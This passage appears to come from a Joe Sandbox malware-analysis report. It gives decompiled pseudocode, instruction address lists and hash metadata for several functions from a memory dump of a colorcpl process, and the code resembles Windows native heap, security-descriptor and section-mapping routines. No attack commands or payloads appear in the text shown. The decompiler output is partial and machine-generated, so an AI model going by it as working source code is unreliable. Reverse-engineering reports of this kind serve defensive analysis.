				_t69 = E04355D90(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0x48);
				_v52 = _t69;
				if(_t69 != 0) {
					_t130 =  &_v60;
					_push( &_v60);
					_push(0x48);
					_push(_t69);
					_push(4);
					_push(0xfffffffa);
					_t151 = E04382BC0();
					__eflags = _t151;
					if(_t151 < 0) {
						L29:
						E04353BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v52);
						__eflags = _t151;
						if(_t151 >= 0) {
							L32:
							return E04384B50(_t151, _t127, _v8 ^ _t155, _t143, _t150, _t151);
						}
						L30:
						if( *_t127 != 0) {
							E04353BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *_t127);
							 *_t127 =  *_t127 & 0x00000000;
						}
						goto L32;
					}
					_v56 = _v56 & 0;
					_push( &_v60);
					_push(4);
					_push( &_v56);
					_push(0x1d);
					_push(0xfffffffa);
					_t79 = E04382BC0();
					__eflags = _t79;
					if(_t79 < 0) {
						L11:
						_t133 = 0x34;
						__eflags = _t150;
						if(_t150 != 0) {
							_t133 = 0x44 + ( *( *_t150 + 1) & 0x000000ff) * 4;
						}
						_t80 = _v28;
						__eflags = _t80;
						if(_t80 != 0) {
							_t133 = _t133 + ( *(_t80 + 1) & 0x000000ff) * 4 + 0x10;
							__eflags = _t133;
						}
						_t152 = _t133 + (( *( *_v52 + 1) & 0x000000ff) + 0xe) * 4;
						_t86 = E04355D90(_t133,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t133 + (( *( *_v52 + 1) & 0x000000ff) + 0xe) * 4);
						 *_t127 = _t86;
						__eflags = _t86;
						if(_t86 != 0) {
							E04367C20(_t86, _t152, 2);
							E043682F0( &_v24,  &_v36, 1);
							_v16 = 0x12;
							_push(0);
							_push( &_v24);
							_push(0x10000000);
							_push(0);
							_t144 = 2;
							E0436366E( *_t127, _t144, __eflags);
							E043682F0( &_v24,  &_v36, 2);
							_push(0);
							_push( &_v24);
							_push(0x10000000);
							_push(0);
							_t145 = 2;
							_v16 = 0x20;
							_v12 = 0x220;
							E0436366E( *_t127, _t145, __eflags);
							__eflags = _t150;
							if(__eflags != 0) {
								_push(0);
								_push( *_t150);
								_push(0x10000000);
								_push(0);
								_t149 = 2;
								E0436366E( *_t127, _t149, __eflags);
							}
							_t128 = _v28;
							__eflags = _t128;
							if(__eflags == 0) {
								_t154 = _v40;
							} else {
								_push(0);
								_push(_t128);
								_push(0x10000000);
								_push(0);
								_t154 = _v40;
								_t148 = 2;
								E0436366E( *_v40, _t148, __eflags);
							}
							_push(0);
							_push( *_v52);
							_push(0x10000000);
							_push(0);
							_t146 = 2;
							E0436366E( *_t154, _t146, __eflags);
							E043682F0( &_v24,  &_v48, 1);
							_push(0);
							_push( &_v24);
							_push(0x80000000);
							_push(0);
							_v16 = 0;
							_t147 = 2;
							E0436366E( *_t154, _t147, __eflags);
							E043682F0( &_v24,  &_v36, 1);
							_push(0);
							_push( &_v24);
							_push(0x80000000);
							_push(0);
							_t143 = 2;
							_v16 = 7;
							E0436366E( *_t154, _t143, __eflags);
							_t151 = 0;
							__eflags = 0;
							goto L24;
						} else {
							_t151 = 0xc0000017;
							L17:
							_t128 = _v28;
							L24:
							__eflags = _t150;
							if(_t150 != 0) {
								E04353BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t150);
								_t128 = _v28;
							}
							__eflags = _t128;
							if(_t128 != 0) {
								E04353BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t128);
							}
							_t127 = _v40;
							goto L29;
						}
					}
					__eflags = _v56;
					if(_v56 == 0) {
						goto L11;
					}
					_t150 = E04355D90( &_v60,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0x48);
					__eflags = _t150;
					if(_t150 != 0) {
						_push( &_v60);
						_push(0x48);
						_push(_t150);
						_push(0x1f);
						_push(0xfffffffa);
						_t151 = E04382BC0();
						__eflags = _t151;
						if(_t151 < 0) {
							goto L17;
						}
						_t151 = E043D64B0( &_v60,  *_t150,  &_v64);
						__eflags = _t151;
						if(_t151 < 0) {
							goto L17;
						}
						__eflags = _v64 - 1;
						if(__eflags != 0) {
							goto L11;
						}
						_t151 = E043D6400(_t130, _t143, __eflags,  *_t150,  &_v28);
						__eflags = _t151;
						if(_t151 < 0) {
							goto L17;
						}
						goto L11;
					}
					_t151 = 0xc0000017;
					goto L29;
				}
				_t151 = 0xc0000017;
				goto L30;
			}

0x043c60a0
0x043c60af
0x043c60b3
0x043c60bc
0x043c60be
0x043c60c1
0x043c60c4
0x043c60c7
0x043c60ca
0x043c60d3
0x043c60d6
0x043c60dc
0x043c60e5
0x043c60ea
0x043c60ef
0x043c60fb
0x043c60fe
0x043c60ff
0x043c6101
0x043c6102
0x043c6104
0x043c610b
0x043c610d
0x043c610f
0x043c632c
0x043c633a
0x043c633f
0x043c6341
0x043c635d
0x043c636d
0x043c636d
0x043c6343
0x043c6346
0x043c6355
0x043c635a
0x043c635a
0x00000000
0x043c6346
0x043c6115
0x043c611b
0x043c611c
0x043c6121
0x043c6122
0x043c6124
0x043c6126
0x043c612b
0x043c612d
0x043c6194
0x043c6196
0x043c6197
0x043c6199
0x043c61a1
0x043c61a1
0x043c61a8
0x043c61ab
0x043c61ad
0x043c61b6
0x043c61b6
0x043c61b6
0x043c61c5
0x043c61d4
0x043c61d9
0x043c61db
0x043c61dd
0x043c61f0
0x043c61ff
0x043c620b
0x043c6212
0x043c6213
0x043c6214
0x043c6219
0x043c621c
0x043c621d
0x043c622c
0x043c6236
0x043c6237
0x043c6238
0x043c623d
0x043c6240
0x043c6241
0x043c6248
0x043c624f
0x043c6254
0x043c6256
0x043c625a
0x043c625b
0x043c625d
0x043c6262
0x043c6265
0x043c6266
0x043c6266
0x043c626b
0x043c626e
0x043c6270
0x043c6289
0x043c6272
0x043c6272
0x043c6273
0x043c6274
0x043c6279
0x043c627a
0x043c627f
0x043c6282
0x043c6282
0x043c6291
0x043c6293
0x043c6295
0x043c629a
0x043c629e
0x043c629f
0x043c62ae
0x043c62b8
0x043c62b9
0x043c62ba
0x043c62bf
0x043c62c2
0x043c62c7
0x043c62c8
0x043c62d7
0x043c62e1
0x043c62e3
0x043c62e4
0x043c62e9
0x043c62ed
0x043c62ee
0x043c62f5
0x043c62fa
0x043c62fa
0x00000000
0x043c61df
0x043c61df
0x043c61e4
0x043c61e4
0x043c62fc
0x043c62fc
0x043c62fe
0x043c630c
0x043c6311
0x043c6311
0x043c6314
0x043c6316
0x043c6324
0x043c6324
0x043c6329
0x00000000
0x043c6329
0x043c61dd
0x043c612f
0x043c6132
0x00000000
0x00000000
0x043c6146
0x043c6148
0x043c614a
0x043c6159
0x043c615a
0x043c615c
0x043c615d
0x043c615f
0x043c6166
0x043c6168
0x043c616a
0x00000000
0x00000000
0x043c6177
0x043c6179
0x043c617b
0x00000000
0x00000000
0x043c617d
0x043c6181
0x00000000
0x00000000
0x043c618e
0x043c6190
0x043c6192
0x00000000
0x00000000
0x00000000
0x043c6192
0x043c614c
0x00000000
0x043c614c
0x043c60f1
0x00000000

Strings

, xrefs: 043C6241

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 830f59fc3566b2a6f11905255c601be8aa0bc5bfbd0a43d2263589da13109c0f
Instruction ID: 38dcb776a5cdaee665b96ae21e6af858fa8fc450730b935e336f27792a8b903b
Opcode Fuzzy Hash: 830f59fc3566b2a6f11905255c601be8aa0bc5bfbd0a43d2263589da13109c0f
Instruction Fuzzy Hash: C7918172A40219AFEB21DF95CD85FAEB7B8EF09754F105059F601AB291DB74BD00CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0437A580 Relevance: 1.4, Strings: 1, Instructions: 200
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E0437A580(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t87;
				signed int _t88;
				signed short* _t89;
				signed int _t91;
				signed int _t93;
				signed int _t94;
				signed int _t96;
				signed int _t100;
				void* _t101;
				signed int _t102;
				signed int _t104;
				signed int _t110;
				signed int _t115;
				signed int _t119;
				intOrPtr _t122;
				signed int _t128;
				signed int _t129;
				signed int _t130;
				signed int _t135;
				signed int _t136;
				void* _t137;
				signed char _t139;
				signed short* _t141;
				signed int _t144;
				signed int _t145;
				void* _t147;

				_t143 = __esi;
				_t140 = __edi;
				_push(0x3c);
				_push(0x441c9a0);
				E04397BE4(__ebx, __edi, __esi);
				 *(_t147 - 0x48) =  *(_t147 + 0x10);
				_t110 =  *(_t147 + 8);
				 *(_t147 - 0x4c) = _t110;
				_t114 = 0;
				 *((char*)(_t147 - 0x19)) = 0;
				_t87 =  *[fs:0x30];
				if(( *(_t87 + 0x68) & 0x00000800) != 0) {
					__eflags =  *0x4436d3c - _t114; // 0x0
					if(__eflags != 0) {
						L6:
						__eflags = _t110;
						if(_t110 == 0) {
							L9:
							 *(_t147 - 0x34) = _t114;
							 *(_t147 - 4) = _t114;
							__eflags = _t110;
							if(_t110 == 0) {
								L15:
								_t144 = _t114;
								 *(_t147 - 0x28) = _t144;
								_t128 = _t114;
								 *(_t147 - 0x40) = _t128;
								_t88 = 0x21;
								_t141 =  *(_t147 + 0x14);
								__eflags =  *_t141 - _t88;
								if( *_t141 != _t88) {
									 *(_t147 - 0x24) = _t114;
									L20:
									_t89 = _t141;
									 *(_t147 - 0x30) = _t89;
									while(1) {
										_t115 =  *_t89 & 0x0000ffff;
										__eflags = _t115;
										if(_t115 != 0) {
											goto L27;
										} else {
											break;
										}
										while(1) {
											L27:
											_t89 =  &(_t89[1]);
											 *(_t147 - 0x30) = _t89;
											__eflags = _t115;
											if(_t115 == 0) {
												break;
											}
											_t115 =  *_t89 & 0x0000ffff;
										}
										_t128 = _t128 + 1;
										 *(_t147 - 0x40) = _t128;
									}
									__eflags = _t128;
									if(_t128 == 0) {
										L50:
										_t145 = _t144 << 0x12;
										__eflags = _t145;
										L51:
										 *(_t147 - 0x34) = _t145;
										 *(_t147 - 4) = 0xfffffffe;
										E043B66C4(_t110);
										_t91 = _t145;
										L2:
										 *[fs:0x0] =  *((intOrPtr*)(_t147 - 0x10));
										return _t91;
									}
									_t119 = E043E7786(_t110, _t128);
									 *(_t147 - 0x20) = _t119;
									__eflags = _t119;
									if(_t119 == 0) {
										goto L50;
									}
									_t93 = 0x17;
									 *(_t147 - 0x2c) = _t93;
									 *(_t147 - 0x44) = _t93;
									_t144 =  *(_t119 + 0xc) & 0x0000ffff;
									 *(_t147 - 0x28) = _t144;
									__eflags = _t144;
									if(_t144 != 0) {
										__eflags = _t144 - 0x800;
										if(_t144 != 0x800) {
											L34:
											_t129 =  *(_t147 + 0x10);
											__eflags = _t129;
											if(_t129 == 0) {
												L42:
												_t94 = 0;
												__eflags = 0;
												_t130 = 0;
												 *(_t147 - 0x24) = 0;
												L43:
												 *(_t147 - 0x3c) = _t130;
												 *(_t147 - 0x30) = _t141;
												while(1) {
													__eflags =  *_t141;
													_t110 =  *(_t147 + 8);
													if( *_t141 == 0) {
														goto L50;
													}
													_t120 = _t119 + 0x10;
													 *((intOrPtr*)(_t147 - 0x38)) = _t119 + 0x10;
													__eflags = _t130;
													if(_t130 != 0) {
														E04365C3F(_t120,  *(_t147 - 0x2c) +  *(_t147 - 0x2c), _t130);
														_t94 =  *(_t147 - 0x24);
														_t122 =  *((intOrPtr*)(_t147 - 0x38));
														_t120 = _t122 + _t94 * 2;
														 *((intOrPtr*)(_t147 - 0x38)) = _t122 + _t94 * 2;
													}
													__eflags =  *(_t147 - 0x2c) - _t94 +  *(_t147 - 0x2c) - _t94;
													E04365C3F(_t120,  *(_t147 - 0x2c) - _t94 +  *(_t147 - 0x2c) - _t94, _t141);
													do {
														_t96 =  *_t141 & 0x0000ffff;
														_t141 =  &(_t141[1]);
														 *(_t147 - 0x30) = _t141;
														__eflags = _t96;
													} while (_t96 != 0);
													_t119 =  *(_t147 - 0x20) + 0x40;
													 *(_t147 - 0x20) = _t119;
													_t94 =  *(_t147 - 0x24);
													_t130 =  *(_t147 - 0x3c);
												}
												goto L50;
											}
											_t54 = _t129 + 2; // 0x3
											 *(_t147 - 0x3c) = _t54;
											do {
												_t100 =  *_t129;
												_t129 = _t129 + 2;
												__eflags = _t100;
											} while (_t100 != 0);
											_t135 = _t129 -  *(_t147 - 0x3c);
											__eflags = _t135;
											_t136 = _t135 >> 1;
											 *(_t147 - 0x24) = _t136;
											 *(_t147 - 0x3c) = _t136;
											if(_t135 == 0) {
												goto L42;
											}
											__eflags = _t136 - 0x13;
											if(_t136 < 0x13) {
												_t101 = 0x17;
												_t102 = _t101 - _t136;
												__eflags = _t102;
												 *(_t147 - 0x2c) = _t102;
												 *(_t147 - 0x44) = _t102;
												_t94 =  *(_t147 - 0x24);
											} else {
												_t94 = 0;
												 *(_t147 - 0x24) = 0;
											}
											__eflags =  *(_t147 - 0x3c) - 0x13;
											asm("sbb edx, edx");
											_t130 = _t136 &  *(_t147 - 0x48);
											goto L43;
										}
										_push(L"GlobalTags");
										L32:
										_t137 = 0x2e;
										__eflags = _t119 + 0x10;
										E04365C3F(_t119 + 0x10, _t137);
										_t119 =  *(_t147 - 0x20);
										L33:
										_t119 = _t119 + 0x40;
										__eflags = _t119;
										 *(_t147 - 0x20) = _t119;
										_t144 =  *(_t119 + 0xc) & 0x0000ffff;
										 *(_t147 - 0x28) = _t144;
										goto L34;
									}
									_t104 =  *(_t147 - 0x24);
									__eflags = _t104;
									if(_t104 == 0) {
										goto L33;
									}
									_push(_t104);
									goto L32;
								}
								_t36 =  &(_t141[1]); // 0x12
								 *(_t147 - 0x24) = _t36;
								while(1) {
									_t141 =  &(_t141[1]);
									 *(_t147 + 0x14) = _t141;
									__eflags = _t88;
									if(_t88 == 0) {
										goto L20;
									}
									_t88 =  *_t141 & 0x0000ffff;
								}
								goto L20;
							}
							_t139 =  *(_t147 + 0xc) |  *(_t110 + 0x44);
							__eflags = _t139 & 0x61000000;
							asm("bt edx, 0x1c");
							__eflags = (_t87 & 0xffffff00 | (_t139 & 0x61000000) >= 0x00000000) & (_t114 & 0xffffff00 | (_t139 & 0x61000000) != 0x00000000);
							if(__eflags == 0) {
								__eflags = _t139 & 0x00000001;
								if((_t139 & 0x00000001) == 0) {
									E0434FED0( *((intOrPtr*)(_t110 + 0xc8)));
									 *((char*)(_t147 - 0x19)) = 1;
								}
								_t114 = 0;
								__eflags = 0;
								goto L15;
							}
							_push( *(_t147 + 0x14));
							_push( *(_t147 + 0x10));
							_t145 = E043EF76A(_t110, _t110, _t139, _t140, _t143, __eflags);
							goto L51;
						}
						__eflags =  *((intOrPtr*)(_t110 + 8)) - 0xddeeddee;
						if( *((intOrPtr*)(_t110 + 8)) == 0xddeeddee) {
							goto L1;
						}
						__eflags =  *(_t110 + 0x44) & 0x01000000;
						if(( *(_t110 + 0x44) & 0x01000000) != 0) {
							goto L1;
						}
						goto L9;
					}
					_t87 = E04355D90(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x258);
					 *0x4436d3c = _t87;
					__eflags = _t87;
					if(_t87 == 0) {
						goto L1;
					}
					_t114 = 0;
					__eflags = 0;
					goto L6;
				}
				L1:
				_t91 = 0;
				goto L2;
			}

0x0437a580
0x0437a580
0x0437a580
0x0437a582
0x0437a587
0x0437a58f
0x0437a592
0x0437a595
0x0437a598
0x0437a59a
0x0437a59d
0x0437a5aa
0x043b64a9
0x043b64af
0x043b64d5
0x043b64d5
0x043b64d7
0x043b64f3
0x043b64f3
0x043b64f6
0x043b64f9
0x043b64fb
0x043b6541
0x043b6541
0x043b6543
0x043b6546
0x043b6548
0x043b654d
0x043b654e
0x043b6551
0x043b6554
0x043b656c
0x043b656f
0x043b656f
0x043b6571
0x043b6574
0x043b6574
0x043b6577
0x043b657a
0x00000000
0x00000000
0x00000000
0x00000000
0x043b65b6
0x043b65b6
0x043b65b6
0x043b65b9
0x043b65bc
0x043b65bf
0x00000000
0x00000000
0x043b65c1
0x043b65c1
0x043b65c6
0x043b65c7
0x043b65c7
0x043b657c
0x043b657e
0x043b66a5
0x043b66a5
0x043b66a5
0x043b66a8
0x043b66a8
0x043b66ab
0x043b66b2
0x043b66b7
0x0437a5b2
0x0437a5b5
0x0437a5c1
0x0437a5c1
0x043b658b
0x043b658d
0x043b6590
0x043b6592
0x00000000
0x00000000
0x043b659a
0x043b659b
0x043b659e
0x043b65a1
0x043b65a5
0x043b65a8
0x043b65aa
0x043b65cc
0x043b65d2
0x043b65f4
0x043b65f4
0x043b65f7
0x043b65f9
0x043b6640
0x043b6640
0x043b6640
0x043b6642
0x043b6644
0x043b6647
0x043b6647
0x043b664a
0x043b664d
0x043b664f
0x043b6652
0x043b6655
0x00000000
0x00000000
0x043b6657
0x043b665a
0x043b665d
0x043b665f
0x043b6668
0x043b666d
0x043b6670
0x043b6673
0x043b6676
0x043b6676
0x043b667f
0x043b6681
0x043b6686
0x043b6686
0x043b6689
0x043b668c
0x043b668f
0x043b668f
0x043b6697
0x043b669a
0x043b669d
0x043b66a0
0x043b66a0
0x00000000
0x043b664d
0x043b65fb
0x043b65fe
0x043b6601
0x043b6601
0x043b6604
0x043b6609
0x043b6609
0x043b660e
0x043b660e
0x043b6611
0x043b6613
0x043b6616
0x043b6619
0x00000000
0x00000000
0x043b661b
0x043b661e
0x043b6629
0x043b662a
0x043b662a
0x043b662c
0x043b662f
0x043b6632
0x043b6620
0x043b6620
0x043b6622
0x043b6622
0x043b6635
0x043b6639
0x043b663b
0x00000000
0x043b663b
0x043b65d4
0x043b65d9
0x043b65db
0x043b65dc
0x043b65df
0x043b65e4
0x043b65e7
0x043b65e7
0x043b65e7
0x043b65ea
0x043b65ed
0x043b65f1
0x00000000
0x043b65f1
0x043b65ac
0x043b65af
0x043b65b1
0x00000000
0x00000000
0x043b65b3
0x00000000
0x043b65b3
0x043b6556
0x043b6559
0x043b655c
0x043b655c
0x043b655f
0x043b6562
0x043b6565
0x00000000
0x00000000
0x043b6567
0x043b6567
0x00000000
0x043b655c
0x043b6500
0x043b6503
0x043b650c
0x043b6513
0x043b6515
0x043b652b
0x043b652e
0x043b6536
0x043b653b
0x043b653b
0x043b653f
0x043b653f
0x00000000
0x043b653f
0x043b6517
0x043b651a
0x043b6524
0x00000000
0x043b6524
0x043b64d9
0x043b64e0
0x00000000
0x00000000
0x043b64e6
0x043b64ed
0x00000000
0x00000000
0x00000000
0x043b64ed
0x043b64c1
0x043b64c6
0x043b64cb
0x043b64cd
0x00000000
0x00000000
0x043b64d3
0x043b64d3
0x00000000
0x043b64d3
0x0437a5b0
0x0437a5b0
0x00000000

Strings

GlobalTags, xrefs: 043B65D4

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID: GlobalTags
API String ID: 0-1106856819
Opcode ID: 7a0bc3ab79e69858d5e43e35a85d1cfa82dc1ba434131af284eb4e63a011390d
Instruction ID: 43f29c608229d45898931a86a8693a616e7615bce661f197dc7a933845549f51
Opcode Fuzzy Hash: 7a0bc3ab79e69858d5e43e35a85d1cfa82dc1ba434131af284eb4e63a011390d
Instruction Fuzzy Hash: 4F718D71E0021A9FEF28CF98D5817EDBBF1BF98310F14912AE985A7645E734A901CF91

Uniqueness

Uniqueness Score: -1.00%

Function 0434965A Relevance: 1.4, Strings: 1, Instructions: 191
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E0434965A(signed int __ecx, intOrPtr* __edx, char _a4, intOrPtr* _a8, intOrPtr* _a12, intOrPtr* _a16) {
				char _v8;
				char _v12;
				char _v16;
				signed int _v20;
				char _v24;
				signed int _v28;
				intOrPtr _v32;
				char _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v48;
				signed int _v52;
				intOrPtr _v56;
				char _v60;
				signed int _v64;
				signed int _v68;
				intOrPtr _v72;
				char* _v76;
				signed int _v80;
				char _v84;
				signed int _t78;
				intOrPtr _t100;
				signed int _t102;
				signed int _t103;
				void* _t105;
				signed int _t107;
				void* _t108;
				intOrPtr* _t111;
				intOrPtr* _t112;
				void* _t116;
				intOrPtr _t117;
				signed int _t119;

				_t116 = 0;
				_v28 = __ecx;
				_v8 = 0;
				_v12 = 0;
				_v16 = 0;
				_v24 = 0;
				if(__ecx == 0 || __edx == 0 || _a12 == 0) {
					return 0xc000000d;
				} else {
					if(E0434B920(__ecx, __ecx & 0xfffffffc) == 0) {
						_t119 = 0xc000007b;
						L27:
						if(_v8 != 0) {
							_push(_v8);
							E04382A80();
							_v8 = _t116;
						}
						if(_v16 != 0) {
							_push(_v16);
							_push(0xffffffff);
							E04382C50();
						}
						L25:
						return _t119;
					}
					_t107 = 6;
					asm("sbb ebx, ebx");
					_t108 = 2;
					_t105 = (_t103 & _t107) + _t108;
					if(_a4 != 0) {
						_v36 =  *__edx;
						_v32 =  *((intOrPtr*)(__edx + 4));
						_v20 = 0;
						_v84 = 0x18;
						L33:
						_v80 = _v80 & 0x00000000;
						L10:
						_v68 = _v68 & 0x00000000;
						_v64 = _v64 & 0x00000000;
						_t109 =  &_v8;
						_v72 = 0x40;
						_v76 =  &_v36;
						_t78 = E0434929A( &_v8,  &_v84, _v28);
						_t119 = _t78;
						if(_t116 == 0) {
							_t116 = 0;
							L14:
							if(_t119 < 0) {
								goto L27;
							}
							_push(_v8);
							_push(0x8000000);
							_push(_t105);
							_push(_t116);
							_push(_t116);
							_push(0xf0005);
							_push( &_v12);
							_t119 = E04382E50();
							if(_t119 < 0) {
								goto L27;
							}
							_push(_t105);
							_push(_t116);
							_push(1);
							_v44 = _t116;
							_push( &_v24);
							_v40 = _t116;
							_push( &_v44);
							_push(_t116);
							_push(_t116);
							_push( &_v16);
							_push(0xffffffff);
							_push(_v12);
							_t119 = E04382C30();
							if(_v12 != 0) {
								_push(_v12);
								E04382A80();
								_v12 = _t116;
							}
							if(_t119 < 0) {
								goto L27;
							} else {
								if(E0434B920(_t109, _v16) == 0) {
									_t119 = 0xc000007b;
								}
								if(_t119 < 0) {
									goto L27;
								} else {
									 *_a12 = _v16;
									_t111 = _a16;
									if(_t111 != 0) {
										 *_t111 = _v24;
									}
									_t112 = _a8;
									if(_t112 == 0) {
										if(_v8 != 0) {
											_push(_v8);
											E04382A80();
										}
									} else {
										 *_t112 = _v8;
									}
									goto L25;
								}
							}
						}
						_t117 = _v48;
						if(_t117 != 0) {
							asm("lock xadd [edi], eax");
							if((_t78 | 0xffffffff) != 0) {
								goto L12;
							}
							_push( *((intOrPtr*)(_t117 + 4)));
							E04382A80();
							_t116 = 0;
							E04353BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t117);
							L13:
							E04353BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t116, _v20);
							goto L14;
						}
						L12:
						_t116 = 0;
						goto L13;
					}
					_t119 = E04361C48(_t108,  *((intOrPtr*)(__edx + 4)),  &_v36, 0,  &_v60);
					if(_t119 < 0) {
						goto L27;
					}
					_t100 = _v60;
					_t116 = _v32;
					_v20 = _t116;
					if(_t100 != 0) {
						_v36 = _t100;
						_v32 = _v56;
						_t102 = _v52;
					} else {
						_t102 = 0;
					}
					_v84 = 0x18;
					if(_t116 == 0) {
						goto L33;
					} else {
						_v80 = _t102;
						goto L10;
					}
				}
			}

0x04349669
0x0434966b
0x0434966e
0x04349671
0x04349674
0x04349677
0x0434967c
0x00000000
0x04349693
0x0434969e
0x043a2696
0x043497e8
0x043497ec
0x043a2719
0x043a271c
0x043a2721
0x043a2721
0x043497f6
0x043a2729
0x043a272c
0x043a272e
0x043a272e
0x043497df
0x00000000
0x043497df
0x043496a6
0x043496ad
0x043496b1
0x043496b2
0x043496b8
0x043a26a2
0x043a26a8
0x043a26ab
0x043a26ae
0x043a26b5
0x043a26b5
0x043496ff
0x04349702
0x04349709
0x04349710
0x04349713
0x0434971a
0x0434971d
0x04349722
0x04349726
0x043a26fb
0x0434974b
0x0434974d
0x00000000
0x00000000
0x04349753
0x04349759
0x0434975e
0x0434975f
0x04349760
0x04349761
0x04349766
0x0434976c
0x04349770
0x00000000
0x00000000
0x04349772
0x04349773
0x04349774
0x04349779
0x0434977c
0x04349780
0x04349783
0x04349784
0x04349785
0x04349789
0x0434978a
0x0434978c
0x04349798
0x0434979a
0x0434979c
0x0434979f
0x043497a4
0x043497a4
0x043497a9
0x00000000
0x043497ab
0x043497b5
0x043497fd
0x043497fd
0x043497b9
0x00000000
0x043497bb
0x043497c1
0x043497c3
0x043497c8
0x043497cd
0x043497cd
0x043497cf
0x043497d4
0x043a2706
0x043a270c
0x043a270f
0x043a270f
0x043497da
0x043497dd
0x043497dd
0x00000000
0x043497d4
0x043497b9
0x043497a9
0x0434972c
0x04349731
0x043a26d2
0x043a26d6
0x00000000
0x00000000
0x043a26dc
0x043a26df
0x043a26eb
0x043a26f1
0x04349739
0x04349746
0x00000000
0x04349746
0x04349737
0x04349737
0x00000000
0x04349737
0x043496cf
0x043496d3
0x00000000
0x00000000
0x043496d9
0x043496dc
0x043496df
0x043496e5
0x043a26be
0x043a26c4
0x043a26c7
0x043496eb
0x043496eb
0x043496eb
0x043496ed
0x043496f6
0x00000000
0x043496fc
0x043496fc
0x00000000
0x043496fc
0x043496f6

Strings

@, xrefs: 04349713

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: cf001e69a80641a8cc3ed551a73227fc2f86a0353987b9bba849c8e96c1f93c2
Instruction ID: b82dcb08caa3cb2c7e3d1bb7c7a48fb2a498c6e3eb60ad7aadf9f1712c2b2a97
Opcode Fuzzy Hash: cf001e69a80641a8cc3ed551a73227fc2f86a0353987b9bba849c8e96c1f93c2
Instruction Fuzzy Hash: C86147B5D01219AFEF219FA9C840BEFBBF9EF84714F145159E810A7250D774BA01DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 043CF42F Relevance: 1.4, Strings: 1, Instructions: 161
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E043CF42F(short* __ecx, intOrPtr __edx, intOrPtr* _a4) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				char* _v20;
				signed int _v24;
				char _v28;
				intOrPtr _v32;
				intOrPtr _v40;
				char _v44;
				char _v52;
				char _v60;
				intOrPtr _v64;
				char _v68;
				intOrPtr _v72;
				signed int _v76;
				intOrPtr _v84;
				signed int _t48;
				signed int _t55;
				intOrPtr _t84;
				short _t87;
				intOrPtr _t89;
				void* _t97;
				intOrPtr _t98;
				signed int _t101;

				_t90 = __ecx;
				_v76 = _v76 & 0x00000000;
				_t87 = 0;
				_v72 = __edx;
				if(__ecx == 0 || __edx == 0 || _a4 == 0) {
					_t48 = 0xc000000d;
					goto L26;
				} else {
					if( *__ecx == 0x5c) {
						E04385050(__ecx,  &_v68, __ecx);
						L8:
						_v24 = _v24 & 0x00000000;
						_v12 = _v12 & 0x00000000;
						_v8 = _v8 & 0x00000000;
						_push(0x4021);
						_v20 =  &_v68;
						_push(7);
						_push( &_v52);
						_v28 = 0x18;
						_push( &_v28);
						_push(0x100001);
						_v16 = 0x40;
						_push( &_v76);
						_t55 = E04382CE0();
						_t101 = _t55;
						if(_t87 == 0) {
							L13:
							if(_t101 >= 0) {
								_t97 = E04355D90(_t90,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x410);
								if(_t97 != 0) {
									E04385050(_t90,  &_v60, _v72);
									_push(0);
									_push( &_v68);
									_push(1);
									_push(3);
									_push(0x410);
									_push(_t97);
									_push( &_v60);
									_push(0);
									_push(0);
									_push(0);
									_push(_v84);
									_t101 = E04382D00();
									if(_t101 >= 0) {
										_t66 =  *(_t97 + 0x3c);
										if( *(_t97 + 0x3c) <= 0x104) {
											_t89 = E04355D90(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t66 + 4);
											if(_t89 != 0) {
												_t39 = _t97 + 0x5e; // 0x5e
												E043888C0(_t89, _t39,  *(_t97 + 0x3c));
												 *((short*)(_t89 + ( *(_t97 + 0x3c) >> 1) * 2)) = 0;
												 *_a4 = _t89;
											} else {
												_t101 = 0xc0000017;
											}
										}
									}
									E04353BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t97);
								} else {
									_t101 = 0xc0000017;
								}
							}
							L22:
							if(_v76 != 0) {
								_push(_v76);
								E04382A80();
							}
							_t48 = _t101;
							L26:
							return _t48;
						}
						_t98 = _v32;
						if(_t98 != 0) {
							asm("lock xadd [edi], eax");
							if((_t55 | 0xffffffff) == 0) {
